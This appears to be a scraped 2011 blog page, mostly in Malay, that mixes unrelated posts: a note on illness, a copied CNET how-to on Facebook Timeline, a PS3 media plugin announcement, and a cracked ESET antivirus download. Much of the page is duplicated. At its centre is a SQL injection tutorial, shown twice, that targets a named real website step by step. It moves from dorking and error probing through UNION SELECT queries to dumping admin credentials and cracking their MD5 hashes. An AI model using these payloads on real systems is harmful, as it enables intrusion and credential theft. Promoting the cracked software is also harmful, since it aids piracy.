Lagi satu, masa ni la Allah nak uji kesabaran kita. Baru sakit sikit je bro, takkan la tak boleh tahan kan? Jadi baguslah sebenarnya sakit ni. Nak cerita pun malaslah, boleh gunakan enjin carian seperti Google, Yahoo, Bing dan sebagainya untuk mencari hadis tentang hikmah sakit ni.
Kesimpulan yang dapat aku buat, kalau sakit tu, tak perlulah nak mengeluh. Bersyukurlah sebab Tuhan nak uji kita. Insan-insan terpilih je yang diberi ujian ni. Kalau para nabi dan rasul, ujian diorang lagilah dahsyat. Alhamdulillah.
Oh ye, jangan lupa habiskan antibiotik anda.
How to disable Facebook Timeline and get the old profile back
Editors' note (December 19, 2011): This method for removing Timeline only applied to those who enabled it before its public release. Now that it's being rolled out to everyone, there is no way to remove Timeline and revert back to the old profile.
When Facebook Timeline was announced, it didn't take long for the Internet to figure out that even though the new profile design isn't yet available to the public, anyone could get it immediately with this little hack.
Today, over 1.5 million users have activated Timeline with this workaround, making the new profile visible to each of them and anyone else who has enabled it.
Eventually, Facebook will mandate Timeline for everyone, and when that happens, expect a lot of backlash. Many people, even those who opted in to the new design, seriously dislike it. They're calling it narcissistic, cluttered, and creepy.
If you concur, and you were one of those people who enabled Timeline, there's still a way to enjoy the old profile design (while it lasts.)
Step 1: Head to the Facebook Developers page where you originally created an app to enable Timeline. Click "Edit app."
(Credit: Screenshot by Sharon Vaknin/CNET)
Step 2: The only way to remove Timeline is to delete the app. If you are an actual developer, you're out of luck. Otherwise, click "Delete app" in the left sidebar.
Once you confirm the app deletion, your Facebook Timeline will be disabled.
About Sharon Vaknin
Sharon Vaknin is a CNET How To expert focusing on mobile devices, Web services, and computing. When she's not giving tech advice, she's cooking, working out, or eating sushi.
When Facebook Timeline was announced, it didn't take long for the Internet to figure out that even though the new profile design isn't yet available to the public, anyone could get it immediately with this little hack.
Today, over 1.5 million users have activated Timeline with this workaround, making the new profile visible to each of them and anyone else who has enabled it.
Eventually, Facebook will mandate Timeline for everyone, and when that happens, expect a lot of backlash. Many people, even those who opted in to the new design, seriously dislike it. They're calling it narcissistic, cluttered, and creepy.
If you concur, and you were one of those people who enabled Timeline, there's still a way to enjoy the old profile design (while it lasts.)
Step 1: Head to the Facebook Developers page where you originally created an app to enable Timeline. Click "Edit app."
(Credit: Screenshot by Sharon Vaknin/CNET)
Step 2: The only way to remove Timeline is to delete the app. If you are an actual developer, you're out of luck. Otherwise, click "Delete app" in the left sidebar.
Once you confirm the app deletion, your Facebook Timeline will be disabled.
About Sharon Vaknin
Sharon Vaknin is a CNET How To expert focusing on mobile devices, Web services, and computing. When she's not giving tech advice, she's cooking, working out, or eating sushi.
Sunday, 25 December 2011
Saturday, 24 December 2011
Assalamualaikum Kepada Yang Islam Dan Selamat Sejahtera Kepada Yang Bukan Islam
Hari Ini Afnum Nk Ajar Korg Apa yg afnum jumpa dkt http://www.hackforums.net/index.php
hihi
baiklah mari kita mulakan
1.Gunakan Dork Ini Di Google ye
Disebabkan terlalu Bnyk List Nye
jadi afnum terpaksa la letak dekat Pastebin ye :D
ni link nye:http://pastebin.com/5qG5zwUy
Sekarang Kita Nk Check Url yg korg pilih ni Vuln atau tidak?
kita hanya perlu letakkan ' di belakang url
Skrg Kita Da Dpt target kita
Example:http://www.cocobod.gh/news_details.php?id=30
Skrg ni baru la kita bole tengok yg ianya vuln ataw tidak mcm yg saya type dekat atas tadi
hanya Letakkan ' di belakang url
Example:http://www.cocobod.gh/news_details.php?id=30'
Kalau Kita DApat Eror mcm gambar dekat bwh ni.itu bermakna yg website ini VULNRABLE
Mari kita teruskan ke langkah yg seterusnya
How To Find Columns Count:
Lepas kita dah ada Vuln site Kite kene la Cari columns.Untuk Mencari columns
anda hanya perlu tambah "Order by X--" Di hujung URL...X adalah nombor 1 hingga Tidak terkira Oleh saya..hihihi
Sebagai contoh, kita mempunyai Website Yg vuln dan kita Cuba Untuk Kira Columns Tersebut,
kita tambah order by 1-- pada akhir URL,Dan Order By 2--, Dan seterusnya.Jangan lupa untuk Sentiasa meningkatkan bilangan sehingga anda mendapat Error dalam laman web anda
Mcm ni:
Jadi Di Website Yg Kita "Target" Tadi Kita Telah MEnggunakan Comand Seperti Berikut:
http://www.cocobod.gh/news_details.php?id=30 order by 1-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 2-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 3-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 4-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 5-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 6-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 7-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 8-- >> Unknown column/error
Disebabkan Sampai Columns no 8 Kita DApat Error
ini Bermakna Columns nombor 8 tidak wujud di website tersebut jadi
Kita akan hanya guna columns 7 sahaja
How to Find The Accessible Columns:
Sekarang, kita dah Tahu bahawa kiraan Columns adalah 7, langkah seterusnya adalah untuk menyemak acsessable columns, untuk berbuat demikian, kita menggunakanini querie "UNION SELECT Number,of,columns--" seperti ini:
Example:http://www.cocobod.gh/news_details.php?id=-30 union select 1,2,3,4,5,6,7--
JGN LUPA LETAKKAN TANDA - di belakang no
mcm ni
http://www.cocobod.gh/news_details.php?id=-30 union select 1,2,3,4,5,6,7--
jgn lupa ye~
Dan Kita Akan Dapat Benda Mcm Ni
Ini bermakna bahawa kita boleh mendapatkan maklumat dari Columns 6,2 3!
How To Get MySQL DB Version:
Skarang ni kita kena taw MySQL DB Version untuk tahu jika kita boleh Exploit
Website ini atau tidak..Kalau Site Yg Menggunakan MySQL 4.X.X Anda Tidak Akan Dapat MengExploit nya Tetapi Version 5.x.x Ke Atas Adalah Exploitable
Cara untuk Mengetahui MySQL DB Version,Gantikan No Colum Yg Tersenarai Di Website Td itu Dengan version() Ataupun @@version Tak ada beza pn antara dua comand ni
Example:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,@@version,7-- or http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,version(),7--
Hasilnya Akan Muncul Seperti Ini:
Inin Bermaksud Yang Kita Boleh Ke Langkah Yang Sterusnya
How To Find Database Name:
Sekarang kita akan inject site ini untuk mencari Nama DB,Untuk melakukan ini.
gantikan version() Atau @@version kepada "group_concat(schema_name)",
dan tambah Dekat belakang URL tu "from information_schema.schemata--"
Example:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(schema_name),7 from information_schema.schemata--
Kita da dapat 2DB dekat site ni
jadi kita akan gunakan salah 1 DB ini
Jadi,untuk menggunakan DB yang Digunakan site ini,Kita kene gantikan "group_concat(schema_name)" Kepada "concat(database())"
Example:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,concat(database()),7 from information_schema.schemata--
Hasil:
Tahniah!
Kita da dpt DB yg Digunakan Site ini
How to Get The Table Names:
Sekarang Ni Kita Nk Kena DApatKan Table Names ,Untuk melakukan ini,
gantikan "concat(database())" kepada "group_concat(table_name)" dan gantikan
"from information_schema.schemata--" Kepada "from information_schema.tables where table_schema=database()--" dekat akhir URL
Example:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(table_name),7 from information_schema.tables where table_schema=database()--
Haslinya:
OMG.nampaknya kita da jumpa Table Names.dan Kita da jumpa Admin ^^
How To Get Column Names:
Untuk Mendapatkan Column Names kita akan menggunakan comand ini
Gantikan "group_concat(table_name)" kepada "group_concat(column_name)"
Dan juga Anda harus gantikan "from information_schema.tables where table_schema=database()--" Kepada from information_schema.columns where table_schema=database()--
Example:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(column_name),7 from information_schema.columns where table_schema=database()--
OMG2 skrg ni kita da dapat Column names yg menyimpan Username dan Password
How To Get Informations From Columns:
Sekarang Ni Kita Da Sampai ke Langkah yg Terakhir!
OMG Seronoknye :D
Sekarang ni kita akan dapatkan INfo Admin daripada Columns
Bagaimanakah Cara Untuk kita melakukannya?
senang je..hihihi
mari ikut saya lakukannya :D
Example:http://www.site.com/news_details.php?id=30 union select 1,2,3,4,5,group_concat(columusername,0x3a,columnpassword),7 from cocobod_gh.coc_admin--
0x3a membawa maksud ":"
"cocobod_gh"
adalah DB yg digunakan Site ini jadi jika site lain menggunakan DB yang bernama lain..
korg kena la tukar nama DB ni ye
"coc_admin--"
adalah nama table yg kita guna tadi
mcm dekat
HOW TO GET TABLE NAMES
kalau site lain menggunakan
contoh:new_admin
korg kene tukar coc_admin kepada new_admin
Hasilnya!:
Alahai Kita dapat pasword yg Di Telah di Crypted Oleh MD5
Jadi kita kene la pigi Encrypt MD5 ini
gunakan Site ini untuk Encrypt MD5
http://www.md5decrypter.co.uk/
Dan Terpapar La Password yg di Crypt Oleh MD5 ^^
Translated and Edited By:aFnuM
Any question about This tut Plz Ask Us At
Sharing Is Caring
Credit To:Hackforums
Hari Ini Afnum Nk Ajar Korg Apa yg afnum jumpa dkt http://www.hackforums.net/index.php
hihi
baiklah mari kita mulakan
1.Gunakan Dork Ini Di Google ye
Disebabkan terlalu Bnyk List Nye
jadi afnum terpaksa la letak dekat Pastebin ye :D
ni link nye:http://pastebin.com/5qG5zwUy
Sekarang Kita Nk Check Url yg korg pilih ni Vuln atau tidak?
kita hanya perlu letakkan ' di belakang url
Skrg Kita Da Dpt target kita
Example:http://www.cocobod.gh/news_details.php?id=30
Skrg ni baru la kita bole tengok yg ianya vuln ataw tidak mcm yg saya type dekat atas tadi
hanya Letakkan ' di belakang url
Example:http://www.cocobod.gh/news_details.php?id=30'
Kalau Kita DApat Eror mcm gambar dekat bwh ni.itu bermakna yg website ini VULNRABLE
Mari kita teruskan ke langkah yg seterusnya
How To Find Columns Count:
Lepas kita dah ada Vuln site Kite kene la Cari columns.Untuk Mencari columns
anda hanya perlu tambah "Order by X--" Di hujung URL...X adalah nombor 1 hingga Tidak terkira Oleh saya..hihihi
Sebagai contoh, kita mempunyai Website Yg vuln dan kita Cuba Untuk Kira Columns Tersebut,
kita tambah order by 1-- pada akhir URL,Dan Order By 2--, Dan seterusnya.Jangan lupa untuk Sentiasa meningkatkan bilangan sehingga anda mendapat Error dalam laman web anda
Mcm ni:
Jadi Di Website Yg Kita "Target" Tadi Kita Telah MEnggunakan Comand Seperti Berikut:
http://www.cocobod.gh/news_details.php?id=30 order by 1-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 2-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 3-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 4-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 5-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 6-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 7-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 8-- >> Unknown column/error
Disebabkan Sampai Columns no 8 Kita DApat Error
ini Bermakna Columns nombor 8 tidak wujud di website tersebut jadi
Kita akan hanya guna columns 7 sahaja
How to Find The Accessible Columns:
Sekarang, kita dah Tahu bahawa kiraan Columns adalah 7, langkah seterusnya adalah untuk menyemak acsessable columns, untuk berbuat demikian, kita menggunakanini querie "UNION SELECT Number,of,columns--" seperti ini:
Example:http://www.cocobod.gh/news_details.php?id=-30 union select 1,2,3,4,5,6,7--
JGN LUPA LETAKKAN TANDA - di belakang no
mcm ni
http://www.cocobod.gh/news_details.php?id=-30 union select 1,2,3,4,5,6,7--
jgn lupa ye~
Dan Kita Akan Dapat Benda Mcm Ni
Ini bermakna bahawa kita boleh mendapatkan maklumat dari Columns 6,2 3!
How To Get MySQL DB Version:
Skarang ni kita kena taw MySQL DB Version untuk tahu jika kita boleh Exploit
Website ini atau tidak..Kalau Site Yg Menggunakan MySQL 4.X.X Anda Tidak Akan Dapat MengExploit nya Tetapi Version 5.x.x Ke Atas Adalah Exploitable
Cara untuk Mengetahui MySQL DB Version,Gantikan No Colum Yg Tersenarai Di Website Td itu Dengan version() Ataupun @@version Tak ada beza pn antara dua comand ni
Example:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,@@version,7-- or http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,version(),7--
Hasilnya Akan Muncul Seperti Ini:
Inin Bermaksud Yang Kita Boleh Ke Langkah Yang Sterusnya
How To Find Database Name:
Sekarang kita akan inject site ini untuk mencari Nama DB,Untuk melakukan ini.
gantikan version() Atau @@version kepada "group_concat(schema_name)",
dan tambah Dekat belakang URL tu "from information_schema.schemata--"
Example:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(schema_name),7 from information_schema.schemata--
Kita da dapat 2DB dekat site ni
jadi kita akan gunakan salah 1 DB ini
Jadi,untuk menggunakan DB yang Digunakan site ini,Kita kene gantikan "group_concat(schema_name)" Kepada "concat(database())"
Example:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,concat(database()),7 from information_schema.schemata--
Hasil:
Tahniah!
Kita da dpt DB yg Digunakan Site ini
How to Get The Table Names:
Sekarang Ni Kita Nk Kena DApatKan Table Names ,Untuk melakukan ini,
gantikan "concat(database())" kepada "group_concat(table_name)" dan gantikan
"from information_schema.schemata--" Kepada "from information_schema.tables where table_schema=database()--" dekat akhir URL
Example:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(table_name),7 from information_schema.tables where table_schema=database()--
Haslinya:
OMG.nampaknya kita da jumpa Table Names.dan Kita da jumpa Admin ^^
How To Get Column Names:
Untuk Mendapatkan Column Names kita akan menggunakan comand ini
Gantikan "group_concat(table_name)" kepada "group_concat(column_name)"
Dan juga Anda harus gantikan "from information_schema.tables where table_schema=database()--" Kepada from information_schema.columns where table_schema=database()--
Example:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(column_name),7 from information_schema.columns where table_schema=database()--
OMG2 skrg ni kita da dapat Column names yg menyimpan Username dan Password
How To Get Informations From Columns:
Sekarang Ni Kita Da Sampai ke Langkah yg Terakhir!
OMG Seronoknye :D
Sekarang ni kita akan dapatkan INfo Admin daripada Columns
Bagaimanakah Cara Untuk kita melakukannya?
senang je..hihihi
mari ikut saya lakukannya :D
Example:http://www.site.com/news_details.php?id=30 union select 1,2,3,4,5,group_concat(columusername,0x3a,columnpassword),7 from cocobod_gh.coc_admin--
0x3a membawa maksud ":"
"cocobod_gh"
adalah DB yg digunakan Site ini jadi jika site lain menggunakan DB yang bernama lain..
korg kena la tukar nama DB ni ye
"coc_admin--"
adalah nama table yg kita guna tadi
mcm dekat
HOW TO GET TABLE NAMES
kalau site lain menggunakan
contoh:new_admin
korg kene tukar coc_admin kepada new_admin
Hasilnya!:
Alahai Kita dapat pasword yg Di Telah di Crypted Oleh MD5
Jadi kita kene la pigi Encrypt MD5 ini
gunakan Site ini untuk Encrypt MD5
http://www.md5decrypter.co.uk/
Dan Terpapar La Password yg di Crypt Oleh MD5 ^^
Translated and Edited By:aFnuM
Any question about This tut Plz Ask Us At
Sharing Is Caring
Credit To:Hackforums
Friday, 23 December 2011
webMedia plugin for Showtime Media Player
PlayStation developer Andreus Sebes has released a plugin for Showtime Media Player. webMedia plugin for Showtime allows you to read RSS feeds, live TV & radio and XML data files on your PlayStation 3.
webMedia plugin for Showtime is a free internet source media reader. Can read RSS feeds, Imagecast, Podcast, Videocast, Live TV& Radio. I built this plugin for my own use because I wanted more than current Showtime plugins can give. The purpose of this plugin is to have the possibility to read free media sources available on the Internet. I thank Andreas Öman for Showtime, a wonderfull application, for always improving it and for all the plugin documentation. I also thank facanferff and NP for their excelent plugins.
Release notes: 1.0: Initial version
Read RSS feeds (RSS, Imagecast, Podcast and Videocast)
Read Live TV/Live Radio (rtmp)
Read up to four XML data files from HTTP or SMB (just one URL needed)
Settings for choose if want to aggregate sources
By publisher
By theme
By country (242 countries by default)
By type (6 types by default)
If you want to, you can choose a parental control level (1 to 9) for each source
If you want to, you can choose if each source is your favorite
Extremely flexible, for each source, you can have a simple xml with title and link or a more complex xml with title, link, thumbnail, themes, publisher, country, type, parental control and if is your favorite
Some debug settings
Installing:
webMedia, is available directly from Showtime plugin repository. Just install it from there (the puzzle peace in showtime homepage right top corner). Create your sources XML file Put the path of your source xml file in webmedia plugin showtime settings (for those that don't know how to do it, see the readme file) Run it!
Suggestions & feedback are welcome. But take into account that there are problems related with showtime that are not related to this plugin. So if you have freezes or something like that, add a bug to showtime tasks in showtime website.
download
webMedia plugin for Showtime is a free internet source media reader. Can read RSS feeds, Imagecast, Podcast, Videocast, Live TV& Radio. I built this plugin for my own use because I wanted more than current Showtime plugins can give. The purpose of this plugin is to have the possibility to read free media sources available on the Internet. I thank Andreas Öman for Showtime, a wonderfull application, for always improving it and for all the plugin documentation. I also thank facanferff and NP for their excelent plugins.
Release notes: 1.0: Initial version
Read RSS feeds (RSS, Imagecast, Podcast and Videocast)
Read Live TV/Live Radio (rtmp)
Read up to four XML data files from HTTP or SMB (just one URL needed)
Settings for choose if want to aggregate sources
By publisher
By theme
By country (242 countries by default)
By type (6 types by default)
If you want to, you can choose a parental control level (1 to 9) for each source
If you want to, you can choose if each source is your favorite
Extremely flexible, for each source, you can have a simple xml with title and link or a more complex xml with title, link, thumbnail, themes, publisher, country, type, parental control and if is your favorite
Some debug settings
Installing:
webMedia, is available directly from Showtime plugin repository. Just install it from there (the puzzle peace in showtime homepage right top corner). Create your sources XML file Put the path of your source xml file in webmedia plugin showtime settings (for those that don't know how to do it, see the readme file) Run it!
Suggestions & feedback are welcome. But take into account that there are problems related with showtime that are not related to this plugin. So if you have freezes or something like that, add a bug to showtime tasks in showtime website.
download
ESET Smart Security Nod32 Final + Crack
ESET Smart Security is the first representative of the new approach to truly integrated computer security for all users. It utilizes the speed and precision of ESET NOD32 Antivirus, which is guaranteed by the most recent version of the ThreatSense(R) scanning engine, combined with the tailor-made Personal firewall and Antispam modules. The result is an intelligent system which is constantly on alert for attacks and malicious software endangering your computer.
ESET Smart Security is not a clumsy conglomerate of various products in one package, as offered by other vendors. It is the result of a long-term effort to combine maximum protection with minimum system footprint. The advanced technologies based on artificial intelligence are capable of proactively eliminating the penetration of viruses, spyware, trojan horses, worms, adware, rootkits, and other Internet-borne attacks without hindering system performance or disrupting your computer .
The long-time development experience of our experts is demonstrated by the entirely new architecture of the ESET Smart Security program, which guarantees maximum detection with minimum system requirements. The complex security solution contains modules with several advanced options. The following list offers you a brief overview of these modules.
Antivirus & Antispyware
This module is built upon the ThreatSense(R) scanning core, which was used for the first time in the award-winning NOD 32 Antivirus system. The ThreatSense(R) core is optimized and improved with the new ESET Smart Security architecture.
Improved Cleaning
? The antivirus system now intelligently cleans and deletes most of the detected infiltrations without requiring user intervention.
Background Scanning Mode
? Computer scanning can be launched in the background without slowing down performance.
Smaller Update Files
? Core optimization processes keep the size of update files smaller than in version 2.7. Also, the protection of update files against damage has been improved.
Popular EMail Client Protection
? It is now possible to scan incoming mail not only in MS Outlook but also in Outlook Express and Windows Mail.
Variety of Other Minor Improvements
? Direct access to file systems for high speed and throughput.
? Blocking access to infected files
? Optimization for the Windows Security Center, including Vista.
Personal firewall
The personal firewall monitors all traffic between a protected computer and other computers in the network. ESET personal firewall contains advanced functions as listed below.
Low layer network communication scanning
? Network communication scanning on the Data Link Layer enables ESET Personal Firewall to overcome a variety of attacks that would otherwise be undetectable.
IPv6 support
? ESET Personal Firewall displays IPv6 addresses and allows users to create rules for them.
Executable file monitoring
? Monitoring changes in executable files in order to overcome infection. It is possible to allow file modification of signed applications.
File scanning integrated with HTTP and POP3
? Integrated file scanning into the HTTP and POP3 application protocols. Users are protected when browsing the Internet or downloading emails.
Intrusion Detection System
? Ability to recognize the character of network communication and various types of network attacks and an option to automatically ban such communication.
Interactive, Automatic or Policy-based mode support
? Users can select whether the firewall actions will be executed automatically, or if they want to set rules interactively. Communication in policy-based mode is handled according to rules predefined by the user or the network administrator.
Supersedes Integrated Windows Firewall
? Supersedes the Integrated Windows Firewall, it also interacts with the Windows Security Center so the user is always informed about his security status. ESET Smart Security installation turns off the windows firewall by default
Antispam
ESET Antispam filters unsolicited email and therefore increases the security and comfort of electronic communication.
Incoming Mail Scoring
? All Incoming mail is assigned a rating ranging from 0 (a message is not spam) to 100 (a message is spam), and transferred accordingly into the Junk Mail folder or into a custom folder created by the user. Parallel scanning of incoming emails is possible.
Supports a variety of scanning techniques
? Bayes analysis
? Rule-based scanning
? Global fingerprint database check
Full integration with email clients
? Antispam protection is available to users of Microsoft Outlook, Outlook Express and Windows Mail clients.
Manual spam selection is available
? There is an option to manually check / uncheck email as spam.
Download:
Eset smart security 3.0.626 Cracked 15368 days
With instruction for instalation
No pass!
esset nod 32
crack
ESET Smart Security is not a clumsy conglomerate of various products in one package, as offered by other vendors. It is the result of a long-term effort to combine maximum protection with minimum system footprint. The advanced technologies based on artificial intelligence are capable of proactively eliminating the penetration of viruses, spyware, trojan horses, worms, adware, rootkits, and other Internet-borne attacks without hindering system performance or disrupting your computer .
The long-time development experience of our experts is demonstrated by the entirely new architecture of the ESET Smart Security program, which guarantees maximum detection with minimum system requirements. The complex security solution contains modules with several advanced options. The following list offers you a brief overview of these modules.
Antivirus & Antispyware
This module is built upon the ThreatSense(R) scanning core, which was used for the first time in the award-winning NOD 32 Antivirus system. The ThreatSense(R) core is optimized and improved with the new ESET Smart Security architecture.
Improved Cleaning
? The antivirus system now intelligently cleans and deletes most of the detected infiltrations without requiring user intervention.
Background Scanning Mode
? Computer scanning can be launched in the background without slowing down performance.
Smaller Update Files
? Core optimization processes keep the size of update files smaller than in version 2.7. Also, the protection of update files against damage has been improved.
Popular EMail Client Protection
? It is now possible to scan incoming mail not only in MS Outlook but also in Outlook Express and Windows Mail.
Variety of Other Minor Improvements
? Direct access to file systems for high speed and throughput.
? Blocking access to infected files
? Optimization for the Windows Security Center, including Vista.
Personal firewall
The personal firewall monitors all traffic between a protected computer and other computers in the network. ESET personal firewall contains advanced functions as listed below.
Low layer network communication scanning
? Network communication scanning on the Data Link Layer enables ESET Personal Firewall to overcome a variety of attacks that would otherwise be undetectable.
IPv6 support
? ESET Personal Firewall displays IPv6 addresses and allows users to create rules for them.
Executable file monitoring
? Monitoring changes in executable files in order to overcome infection. It is possible to allow file modification of signed applications.
File scanning integrated with HTTP and POP3
? Integrated file scanning into the HTTP and POP3 application protocols. Users are protected when browsing the Internet or downloading emails.
Intrusion Detection System
? Ability to recognize the character of network communication and various types of network attacks and an option to automatically ban such communication.
Interactive, Automatic or Policy-based mode support
? Users can select whether the firewall actions will be executed automatically, or if they want to set rules interactively. Communication in policy-based mode is handled according to rules predefined by the user or the network administrator.
Supersedes Integrated Windows Firewall
? Supersedes the Integrated Windows Firewall, it also interacts with the Windows Security Center so the user is always informed about his security status. ESET Smart Security installation turns off the windows firewall by default
Antispam
ESET Antispam filters unsolicited email and therefore increases the security and comfort of electronic communication.
Incoming Mail Scoring
? All Incoming mail is assigned a rating ranging from 0 (a message is not spam) to 100 (a message is spam), and transferred accordingly into the Junk Mail folder or into a custom folder created by the user. Parallel scanning of incoming emails is possible.
Supports a variety of scanning techniques
? Bayes analysis
? Rule-based scanning
? Global fingerprint database check
Full integration with email clients
? Antispam protection is available to users of Microsoft Outlook, Outlook Express and Windows Mail clients.
Manual spam selection is available
? There is an option to manually check / uncheck email as spam.
Download:
Eset smart security 3.0.626 Cracked 15368 days
With instruction for instalation
No pass!
esset nod 32
crack
Subscribe to:
Posts (Atom)